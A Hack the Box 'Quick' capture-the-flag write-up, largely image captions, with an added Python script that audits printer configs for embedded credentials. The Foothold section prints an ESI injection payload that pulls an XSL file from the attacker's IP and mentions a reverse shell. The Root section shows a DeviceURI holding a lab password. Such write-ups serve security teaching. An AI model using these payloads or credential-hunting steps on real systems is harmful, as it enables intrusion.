Hack the Box: Quick

Quick

User

Recon

The Nmap TCP scan shows only one attack surface: a webserver on an unusual port, 9001:

nmap scan
Main page
Client list
Login page
We are migrating our portal with latest 
UDP scan, port 443
HTTP/3 connection
Quick portal landing page
About us page
Docs page
Default password
jane
jdoe
mike
mross
john
tim
roy
james
elisa
admin
root
QConsulting.htb
QConsulting.co.uk
QConsulting.uk
QConsulting.com
Darkwing.htb
DarkwingSolutions.htb
Darkwing.com
DarkwingSolutions.com
Darkwing.us
DarkwingSolutions.us
Wink.uk
Wink.co.uk
Wink.com
LazyCoop.com
LazyCoop.cn
ScoobyDoo.it
ScoobyDoo.com
PenguinCrop.fr
PenguinCrop.com
quick.htb
Wfuzz result

Foothold

After logging in I’m greeted with a simple ticketing system:

Quick ticketing system
Request to create ticket
XSS
<esi:include%20src%3d"http://10.10.14.18/"%20stylesheet%3d"http://10.10.14.18/esi.xsl"></esi:include>
Request for tellico
Download attempt
Stager executed
Staging log
Reverse shell
Reverse shell

Privilege escalation

Lateral movement

The sites-available config of Apache suggests that under the virtual domain printerv2.quick.htb there’s another host running on port 9001 with srvadm privileges:

sites-available
Password check
Preparing the hash
Swapping the password to the webapplication
job.php
hunter.sh
Adding printer
Creating printer
Add a job
Hunter.sh
SSH login as srvadm

Root access

The srvadm’s home directory contains an interesting printers.conf file. The DeviceURI parameter of a second printer seems to contain some credentials:

$ cat ~/.cache/conf.d/printers.conf
--snip--
<Printer OLD_Aviatar>
PrinterId 2
--snip--
DeviceURI https://srvadm%40quick.htb:%26ftQ4K3SGde8%3F@printerv3.quick.htb/printer
Root access
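
An audit check for the pattern shown above, as an added example that is not part of the original writeup: it scans printers.conf-style text for DeviceURI values that carry credentials in the userinfo part and percent-decodes the username. The function name and the sample config (placeholder hosts and values) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample in the same shape as the snippet above; all values are placeholders.
SAMPLE_CONF = """\
<Printer Front_Desk>
PrinterId 1
DeviceURI ipp://printer1.example.test/ipp/print
</Printer>
<Printer OLD_Archive>
PrinterId 2
DeviceURI https://svc%40example.test:%26Placeholder1%3F@printer2.example.test/printer
</Printer>
"""

# Opening tag of a printer block: <Printer name> or <DefaultPrinter name>
PRINTER_RE = re.compile(r"^<(?:Default)?Printer\s+(\S+)>\s*$")


def find_embedded_credentials(conf_text):
    """Return one finding per DeviceURI that carries userinfo (user[:password]@host)."""
    findings = []
    printer = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        match = PRINTER_RE.match(line)
        if match:
            printer = match.group(1)
            continue
        if not line.startswith("DeviceURI "):
            continue
        uri = line.split(None, 1)[1]
        parts = urlsplit(uri)
        if parts.username is None and parts.password is None:
            continue  # no userinfo in this URI
        # urlsplit leaves userinfo percent-encoded (%40 is '@'), so decode it here.
        password = unquote(parts.password) if parts.password is not None else None
        findings.append({
            "printer": printer,
            "scheme": parts.scheme,
            "host": parts.hostname,
            "username": unquote(parts.username or ""),
            "has_password": password is not None,
            # Report only the length so the secret does not end up in audit output.
            "password_length": len(password) if password else 0,
        })
    return findings
```

Because the `@` inside the username is encoded as `%40`, the URI still has a single literal `@` separating userinfo from the host, which is why the split lands on the right hostname.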
